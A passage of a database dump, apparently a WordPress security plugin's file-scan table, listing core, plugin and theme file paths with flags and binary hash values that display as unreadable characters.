k�X��','',0,'?'),('��4س�\n��&S:\r','wp-includes/wp-includes/js/autosave.min.js',0,'��CGs|I�\"�~�}}c','��CGs|I�\"�~�}}c','#��ð�|�d�L��W���kY�W�](�y;�','',0,'?'),('�F��>�!8u','wp-content/plugins/wordpress-seo/admin/class-premium-popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E����k�2��È�','8������kf��\0w��S��D��~e��s*��8','',0,'?'),('�<�7v��Y6?���','wp-includes/blocks/separator/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+��\r���Ó�','x�`Y\'��g�vC!�K�qD��w3G[4�P�ô�','',0,'?'),('���_e�m>���1�V��','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-type-archive-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�7k�8��G�`','bY�� 8�0b�ڹ�fX�\0#�2�=��`�v�','',0,'?'),('�����g���~.�2�','wp-content/plugins/wordpress-seo/js/dist/externals-redux.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i&��?�\\LǷ a��','~1��8?3���\0a��<��\0l�\'���`�','',0,'?'),('�ί��?�gW���9','wp-includes/blocks/embed/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����*��@:(Ho\0^|�','ZM���͗=�\"ƛrzn�C�:��}����m�','',0,'?'),('��N���F�V�Y�C','wp-includes/blocks/shortcode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0t�	�ڨ.�j�','{��bw\n~��4�n\"��\"�����#.m�/#1','',0,'?'),('��Q�t�/(�$Dy�','wp-includes/wp-includes/js/codemirror/csslint.js',0,'��M_ϱI����l�','��M_ϱI����l�',']�ih4F��ò�\r��U����WEK(�P�d','',0,'?'),('�槩1��GU��-�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/es.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�\0D/��__�5�\r�^','�bBà�\n%�6 ��m}�C�F>��,[r��','',0,'?'),('��uy�؟�uV��@/��','wp-includes/class-wp-block-patterns-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i�Ԧ*-�w�=��:','\">����M׉���߳iO7�*�ekF�/','',0,'?'),('����wK��\"g�\r�','wp-content/plugins/redirection/models/log/log-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S���l��D��<7�','ϑ�OܕS���]|&��0B_2� ]�oC�','',0,'?'),('��C��bp$��l�S;:','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/special-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��1C��s��D���','D����قV/�Δ��Z6�V=��ZF�L,�7','',0,'?'),('�@}&�J~�¾&��\0','wp-includes/customize/class-wp-customize-new-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N��p��aC�q�k','�F��0�Hyce�LuQ���&��LiH\n�DũK','',0,'?'),('�,f�̀�Ӓ���','wp-content/plugins/wp-smushit/core/modules/class-lazy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ݛ��� ���.�c�','+�ϟ��<\\iaC���Ȭ������I�\'��','',0,'?'),('� ˨f�7�g���E','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Output/QROutputInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)s����t�Tܳ�','�	�޼�?#�N�~sט�܁�{�;�ߦ ����','',0,'?'),('� C��͍�ikniA','wp-includes/wp-includes/js/dist/notices.min.js',0,'�����,s\Z���`a','�����,s\Z���`a','e}��䁸7Y|E:E�ڧ�;�m�*cZ��v�Q\r�','',0,'?'),('� ��D�8�q=�\"]','wp-content/plugins/wordpress-seo/js/dist/externals/schemaBlocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/ѐvsA�w��áW','��ې$���f]��Fוj���1����,','',0,'?'),('�!��K�[_m|�\0�.','wp-content/plugins/redirection/locale/json/redirection-hr.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�0|��e��[��Ί�','��$��2ݫ -1��U,{g�M�����_��','',0,'?'),('�;L�t�׬C����ɣ','wp-content/plugins/wordfence/tmp/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�z~�i�,L���','	��HQI�qz�ڤ�p�9�C4>H���3���G','',0,'?'),('�I��.IB�a�|G���','wp-content/themes/hitmag/inc/customizer/custom-controls/section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�/�t�#�x9���','���v��u3`bXv��I#ӷ+���%�r���','',0,'?'),('�P?~��&�\n0]���','wp-content/plugins/wp-cerber/languages/wp-cerber-nl_NL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�Go8�C�����M','v��h�?c�>K�tѶxP�`!c�Y�\0�6��V�','',0,'?'),('�Y^~5~��p�G-���','wp-includes/js/customize-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Hӷ�-\\Me���','�b����L��-���9wlo��y�$+�Y\Zޘ�N','',0,'?'),('�_�����ې\r���','wp-content/plugins/wordpress-seo/src/conditionals/conditional-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�5E�\Z-���1��','�A�;���ɜ�K���_���#Hz�T�~�:','',0,'?'),('�cRN3���H�����','wp-includes/wp-includes/css/editor-rtl.min.css',0,'��A^�I���4�B\'','��A^�I���4�B\'','ɗ(�|��m��F�EHS7��^��~#����','',0,'?'),('�jU��3�0<�g��b','wp-includes/blocks/paragraph/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�\Z\0���#c��-�','�>�ǡ�e}�֋f�y|4��E\0Dcn2��`+�','',0,'?'),('�q��\0�,8���>','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general/title-separator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��7D��u�����t�',',\\����gU��QS��nǥ8���f3�_E','',0,'?'),('�rI����ɀ5 �F�','wp-includes/Requests/Exception/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��z�� J�^�','����ĺ�̌��&���ֳ���4@78���p','',0,'?'),('�u_����~!\0�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y=\nY�99�2���','���6���\Z/���p�y5��E�ح���O�E','',0,'?'),('�z������|�z�xv','wp-includes/js/jquery/ui/droppable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a<DH���F��#','?��ks����.ȅ��Ӏ�_��j���W#','',0,'?'),('����˕��r&�q�Fi','wp-content/plugins/wordfence/crypto/vendor/composer/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�Q�)�˸�:-*','��8}�ު�]��\"1���&(��䙄�����','',0,'?'),('�1�3�\"ȟ�fˬ','wp-content/plugins/redirection/locale/json/redirection-en_CA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��xcB����~Lo]\Z�','N���d��^�|���������.�U��8h�\\1','',0,'?'),('���1d�YEa$�','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general/force-rewrite-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�ӡc2���@k����','�J-h\\��QK<\nb�\".m�[�(AU!ϕGĎ','',0,'?'),('�;��+�&Y��Đ','wp-content/plugins/wp-cerber/assets/multi/multi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z/�Wn�U#֬��V�K','��\"��%����6�rH��B)�xf�L]4t��','',0,'?'),('�BJ���=4�����','wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-plugin-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g��\'��+�*GL','E(���qA֬h��m�efa��A�\n>�}���@�','',0,'?'),('��u�+���ޢ��','wp-content/plugins/wordpress-seo/src/routes/semrush-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�3�^%��Ļ�ɣ̪�','���*���o��P�s:7�ݹ/�x�N�?ث5','',0,'?'),('リQ�����)B\n�,','wp-content/plugins/wordfence/images/loading_large.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��{Ob�UW~�Y˙','p8�\'���	t���:�Q�o]{5G1����E��','',0,'?'),('��P��a`Xu','wp-admin/css/color-picker-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�:�@ܐ�^J���','�E���_w������1:������-�E','',0,'?'),('��{�� \r�Slſ�	','wp-content/plugins/wordfence/views/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('�ʮ���+�A:\'.X','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z��\ny.�C�','���L�#g�N����V{�����c�$��Ub','',0,'?'),('�̸�WT�Ԣ�4s��','wp-content/plugins/wordpress-seo/js/dist/externals/helpers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�E&7w<��#��lh','�O�Kؘ�7�\\�v��%�J���鶎`��6�K','',0,'?'),('��X=U�pfp���Z','wp-includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<>Q	��FLLJ���É','g�$p={Tl<Wb���J•ӌ�6,*��Q��\\','',0,'?'),('����[�>f4YBSY<�','wp-includes/wp-includes/js/jquery/ui/slider.js',0,'��}�U���Ƥ����','��}�U���Ƥ����','��f,p��`��qR��2�\Z^v�6��`��s�$','',0,'?'),('���4�~��^U1Ex��','wp-includes/blocks/site-title/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"X�\"OK��9\0�','}	����k_[3�?_�Fx�a������','',0,'?'),('��~��t#����<M�=','wp-includes/wp-includes/class-wp-roles.php',0,'��?T�v���|U�y','��?T�v���|U�y','?}]�����b4\0����J�� ��5�.��1U','',0,'?'),('��诠��s�D�U����','wp-content/plugins/wordpress-seo/src/config/migrations/20200408101900_AddCollationToTables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','٧߬a6%�\Z�p�\r�~','J���y�.Lu�d߽�&�M���/\"H�=��١Y','',0,'?'),('�ތt+�\\�+�Xa�ZU','wp-content/plugins/wordfence/lib/wfScan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qdb\r�`俷����','��M)�HMXhn���\'TD�h��`�','',0,'?'),('�㯩�	\'��ި��V','wp-includes/images/smilies/icon_biggrin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��Jr��:�]kI�|',':������ٔ���M����X%	�<8�g4�','',0,'?'),('��6X�Ԫ4��[_��=t','wp-content/plugins/wordfence/lib/wfScanEngine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.����?v�I8��0','#ѱ�J���ffh���w.(��j[�\0����F','',0,'?'),('�����r��o�r��','wp-includes/wp-includes/class-wp-customize-section.php',0,'�`;�V�\'���(��)','�`;�V�\'���(��)','�<s�Jm�ha�!������U\0(0�D\'�F�','',0,'?'),('��c��G���(`E��','wp-content/plugins/wordfence/views/scanner/issue-configReadable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"Xjoz�o���Y���','��{�g�k{aK���*����W��ׅ�$ף','',0,'?'),('��9��r�Mԧ��','wp-includes/js/customize-preview-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Zֻ\\$:Ս��%�','�Qg|X�\'b�9�jY��Qhb�vC��5�','',0,'?'),('� �ލ<:9�|��6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-_�b�->O��\\苃','�sɔg�%��riC��P��w��%��{��J��','',0,'?'),('���6)Jo*��Nn+','wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','洩�`��\"@��)��','[(�Q�@̊�#2�\nH�e��Ec�{רxH8�:','',0,'?'),('�$�ī�I�^��3���','wp-admin/menu-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�Pk�x�-�L,�','��lK�69�<��r�F!��SB�u�#�����','',0,'?'),('�)~�]b6M�p͞s��2','wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.js',0,'Y�����2İ\rm}%��','Y�����2İ\rm}%��','3��].�BCBe��ʢ�S�( ?�Z{����','',0,'?'),('�1��pH}Ejir��','wp-content/plugins/wordpress-seo/js/dist/workouts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qG�͂-�2N�&���Y{','ji���sM��s�@Z��$��&	�����','',0,'?'),('�3�lr�P��_�B','wp-includes/css/dist/block-library/classic.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����o��� �c2:O','� s�T#�ʿ��M�9pڊ�fEe+� �M6','',0,'?'),('�I/\Z�N�2�����p','wp-includes/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�������e���/','1���h�e�+��:�z�a���ͣ4@�','',0,'?'),('�K���}%XC��v�x','wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.ttf.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7���\\���\Z���En','{GS��0�����)��.~��#m�}�:2��','',0,'?'),('�g-�_F�\"���~�\\^T','wp-content/plugins/all-in-one-wp-security-and-firewall/images/success.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t	I �C@g���','�(��(�	(\'S)\0B��_}&l�&�o^s�','',0,'?'),('�UdL�ѣy}���a�','wp-includes/wp-includes/js/jquery/ui/datepicker.min.js',0,'�4}�aX2nH��GWx�{','�4}�aX2nH��GWx�{','/4XAJ\Z����o>V��ꔆ�I����','',0,'?'),('�����3��:���^c','wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-ajax-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dP�X����n��$�','dM���ksq��4�����R�^2�~B\"K�','',0,'?'),('�N ���iiڭ�','wp-includes/random_compat/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z��#�z���K�','�k��!P�BxQA.T��ۄ���๠���ێ��','',0,'?'),('��9�BϠ�3��','wp-content/plugins/wordfence/images/icons/check-care.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@��n?du�ǡos�?','J���X�;�W�`i�\"��[*��&`K�>r4�	','',0,'?'),('���4��3a���7','wp-includes/wp-includes/widgets/class-wp-widget-media-video.php',0,'}◷>y�O�G�','}◷>y�O�G�','10*�u���ۤ��y[\\,�/��7��6�\r','',0,'?'),('��y�u�n���c[٧�','wp-includes/sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`S ����E�X�^YA�','�%��S�i����x3�k���O��nz]���','',0,'?'),('��R(�R�����D�','wp-includes/wp-includes/css/dist/block-library/theme.css',0,'Gs�Ib<���w]G��','Gs�Ib<���w]G��','כ�ppr��›xI�xP^�?	���N�%�u�','',0,'?'),('�з&�L۽¨��VN�','wp-includes/css/buttons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��n��G��f�g���','k!L4>H�i�AF��f�BR�eR@����W�','',0,'?'),('����퐼4��&����','wp-content/plugins/redirection/locale/redirection-ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�&ʥi�i}�CN�f','��(�#�0B��xȫ��[&S=	.�߮���)','',0,'?'),('��h�R���Y�*A{��','wp-includes/wp-includes/images/spinner-2x.gif',0,'1����2��^#�8��','1����2��^#�8��','��#�˒�=$c��6�����	B��4�6','',0,'?'),('���݋O�^k�E�]�Ar','wp-includes/wp-includes/js/dist/redux-routine.min.js',0,'�;TvCg�)Cb\r','�;TvCg�)Cb\r',';hT�*�ݠO���mVggd�\n�@Pp6{}','',0,'?'),('�����9�$�DS�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-points-badge-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=5�gB����!b��','W��#nl3��P� r �l��c=א/ȑ��O:','',0,'?'),('����6$[���O�','wp-admin/css/customize-widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�h���dM�*�E�y','�Z�0ڀ�#]�*���ԯ\r�=��}�i-','',0,'?'),('��\\N��1\n���BZ','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hsb.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E����kB̢��f','E������-��䑣��Z�U�L�����p��','',0,'?'),('�6��e\r~��|l','wp-includes/wp-includes/class-wp-recovery-mode-cookie-service.php',0,'Q�-�����*xrf�','Q�-�����*xrf�','�8�-�H0F�y���G����������Nj�','',0,'?'),('���rp.u�3zx�','wp-admin/includes/class-ftp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cP�j{\"����#� >W','Ȣ�f����+.�_��u e��	�Z�','',0,'?'),('��3P�do�,�t���','wp-includes/blocks/comments-pagination-numbers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+ڏ6<�����\'���','%��.x��Y�av�w\r�a���i�h�i[F','',0,'?'),('�&[��>j���/��GU','wp-includes/js/dist/token-list.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� Q���6�<D��\r8H','�� Ϝ\'ܶH��O��;�R�\"̙��G��','',0,'?'),('�,�1x�@e�<)�','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Token/AccessToken.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p\r\'8�ﺜj�� %','�U ��\Z���a;q��� _���t����3J\n�','',0,'?'),('�7I__����vD!���','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-premium-seo-pack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�!���=�[�uRJZ�','�����F<�R����u�g%g��R�\r]ܨ@�','',0,'?'),('�7s�\\]�}�AA�we1�','wp-admin/tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	`tb�t~�	F\"W�u','|p9�k�������է����0�tK����:','',0,'?'),('�8���םG2��*Ğ�','wp-content/plugins/wp-cerber/assets/sh/styles/shCore.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`L�1�Rg<�1�&�','g΀�0��!r�(��)�uT�T^۽S���Vv�','',0,'?'),('�B�����g��>��t','wp-content/plugins/wp-fastest-cache/js/lang/nl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�\'�t����s','��ׄ/M��z0/-�m��|�1}����','',0,'?'),('�Nbē�p	\n��#?E','wp-content/plugins/wordpress-seo/src/generators/schema/webpage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z¸���o֖��)�,�','\"�[_����c����I�y�̸�\"��a�','',0,'?'),('�Yrr�řq��472','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�Ϳ��]�b�*�r','����E�����o�_?�cwxTӷ!�v%�ޚ�$','',0,'?'),('�Z/���{Lt�ծF$�','wp-admin/js/svg-painter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �V,�~��H�]�d','�\"s��W���`qa�8�4�P٢V�u혧�M:�','',0,'?'),('�k��p�e�I��\\:','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��*EI���>ړH65','��ǞtX�1�%�\r\Z��D�0EE%<=vЃ��','',0,'?'),('�v�:�D�Y�G','wp-includes/js/plupload/plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���zɆ��F���\r�	','wٱ����g��K}�\n����eH�M.=wy�','',0,'?'),('��T���!�&�R�D_','wp-content/themes/hitmag/inc/kirki/modules/postmessage/class-kirki-modules-postmessage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��3y�k�ޝ\nΉ�','f�c�$5 i.R�6?N��65�������1,M','',0,'?'),('�{�[�Q-]=yAx\0�','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-post-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yW`�F��a�+����','z�\n���&LMZo�ΩW�]��0���x\nɗ#�','',0,'?'),('�ͨ޹��0Ɂ�䷑�','wp-includes/blocks/video/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�R���~��H�{vm','&�ƅI�{���aw����[���\"m���_','',0,'?'),('�O_����E�e','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/post_type/woocommerce-shop-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"Qm�\"�۾!j4`m�','�����=��\0u��D�?��v��H�ș\\�H','',0,'?'),('�TY�PpE�w��','wp-includes/widgets/class-wp-widget-archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I4C��dmТ�6�{','�@ o�[����j�S�*��W}7�\'`\r�3��','',0,'?'),('�}�O;U�i��<��','wp-content/plugins/wordpress-seo/src/conditionals/admin-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�Zϓ�}�iF ��o','���;^&`2���:�&(ƽ{ʗ��Ly9\\d�','',0,'?'),('�V���|ڑ��S##�','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-woothemes-seo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3ZxJ�O5�w���','|��Y\"i�G�GÌ�7�:�lD��}e*��x���+','',0,'?'),('��4�����$ꎪ','wp-content/plugins/wordfence/views/scanner/scan-scheduling.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�J��HN��ԑ','r�h,И�Q�U��2 �V�J���6}N\'3�iuK','',0,'?'),('�І$��Hd+ػ�','wp-includes/assets/script-loader-packages.min.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ְ\"���R���E1�','��¬r�uB��f��a`�K�O+-���:','',0,'?'),('��q<�D>ܲ��6��','wp-includes/wp-includes/ms-functions.php',0,'�Q\n����[�|�J/�','�Q\n����[�|�J/�','�8f�٣�“��<}.Q��������','',0,'?'),('�絛�zy���>_+�t','wp-includes/class-wp-user-meta-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8/\'\0�\0��vSL-G\0','����8�b�YB&?�6��o���>','',0,'?'),('����ڳ+�>�(�^','wp-content/plugins/wp-smushit/core/api/class-smush-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A������6��~','�̫z�H�&�Aa�G�����p���9D{[&w��3','',0,'?'),('��͜�ή{�&(t�ӫ','wp-includes/wp-includes/css/dist/editor/editor-styles.css',0,'�iۘ\"���뱠��','�iۘ\"���뱠��','���by:��8�3��o�\Z������\"ڹ�','',0,'?'),('�AK�y��ʼveJ','wp-content/plugins/all-in-one-wp-security-and-firewall/templates/notices/thanks-for-using-main-dash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oº���u���U&_�','��\0��\0a��>y4ra��y����(����T','',0,'?'),('���H�r #�w/�:4','wp-includes/js/dist/plugins.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!-�	ҬQ���~','�iv��:���>v)\rd<���]\Z�.�hۣB���?','',0,'?'),('�#��m�X8��+ˊܵ','wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/empty-token-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4q��kr�D�X�\"]�','�C�`�n)�w�14��K�H�-��_�a��	=','',0,'?'),('�1\n�����x����','wp-includes/blocks/latest-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��TX�����٩0','�\n\"c;�|�‰0U0�=L����]q�ֳ�N@','',0,'?'),('�33��0%��>��b','wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-usage.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�Q��em�z[��&','����\0�\r���K��h���j6�JlzmB#��,�','',0,'?'),('�?��E_�)�xڅ$��','wp-admin/includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8���Kُ������y','lҝ֨\Z�����tfؿ&\Z���zY�Xh�Cc.','',0,'?'),('�L>�;�*	��Y۞m','wp-includes/blocks/preformatted/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E9,��G�r�p�i�_','cSnmqr�:�hNe�W��{(w�D�~n\'�+�','',0,'?'),('�dt�iN@�ğGd�\Z','wp-content/plugins/wordpress-seo/css/dist/yoast-extensions-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�kR\r ��6ee./�','�������5�_��6����ط�z�2k5�','',0,'?'),('�d�To�f��ҷ�bS','wp-content/plugins/wordfence/lib/menu_dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�Go2����\rT~�','�\0p�{dM�]{���⪥ �]�����T-��K','',0,'?'),('�j��\nj<�c�@B�X','wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�q�טw�U��ͰR�','�JwYw�u�n��[���&D�FLV-�2L���','',0,'?'),('�po���X0%������','wp-includes/css/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G\'��Ǩ@@{��}','hԑ��M��\\�C�9��\Zi�\n_�ї��,\nJ','',0,'?'),('�u;Ȍ0�q�w��=��','wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+6���΀J�h�','),ol��R����ZJ��eT�(y� �5����+','',0,'?'),('�~\"�H�� \Z��H�Xo','wp-content/plugins/wp-cerber/languages/wp-cerber-ja.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�ImK�Teq)���6�','h�VNC����0X\r\Z�o;���!���WW�1yL','',0,'?'),('򇊨�DVe�oh�x�','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-aioseo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nK4�ξ��\\���t;','�\r�&S��������|L���l[)4�7','',0,'?'),('�r��>�JR�Kk�j�','wp-includes/wp-includes/images/crystal/archive.png',0,'�S����I0An�','�S����I0An�','L��%X����O�+��Aa�!�S�\\܉�&���','',0,'?'),('�n��E�%̶�uPY�X','wp-content/plugins/wp-cerber/languages/wp-cerber-it_IT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k	��y�j��u�ϋ��','�uw7�\n�i��1x�Y��}��+J(r','',0,'?'),('�ׅ���$�T{8/f','wp-content/plugins/wordpress-seo/src/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\0b`!����v�','>\Ze���\0�4W�\r����T�#��o���;B','',0,'?'),('�y�%@�}H��;,#','wp-includes/wp-includes/customize/class-wp-customize-header-image-setting.php',0,'y�$+��q?��U��','y�$+��q?��U��','�9@mr�ܵ��\"+B���V�K.�uB\"�����','',0,'?'),('�$c{�97^І�J�g','wp-includes/js/dist/server-side-render.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���]%�s��y�p��\Z','��`G��ׂJH�&��.\0:���c�Z��Z8�','',0,'?'),('�cM������E�72','wp-content/plugins/wp-cerber/assets/flags/cu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��ـ���S!��4�','�u,S�W�ݮRҮpLv������#}�R','',0,'?'),('��ŕ��oi|}��','wp-includes/block-supports/custom-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z�0��~����','E����Y�� �C�5�f�t��A%B��W�\0�','',0,'?'),('�M�٦M�/`�','wp-includes/js/swfupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*�#�0�-�Ճp�','H�#����a:��1������߯orrj�uz�zV','',0,'?'),('򱠭��B�R�z��Y','wp-includes/js/jquery/jquery.table-hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�go����~i�I	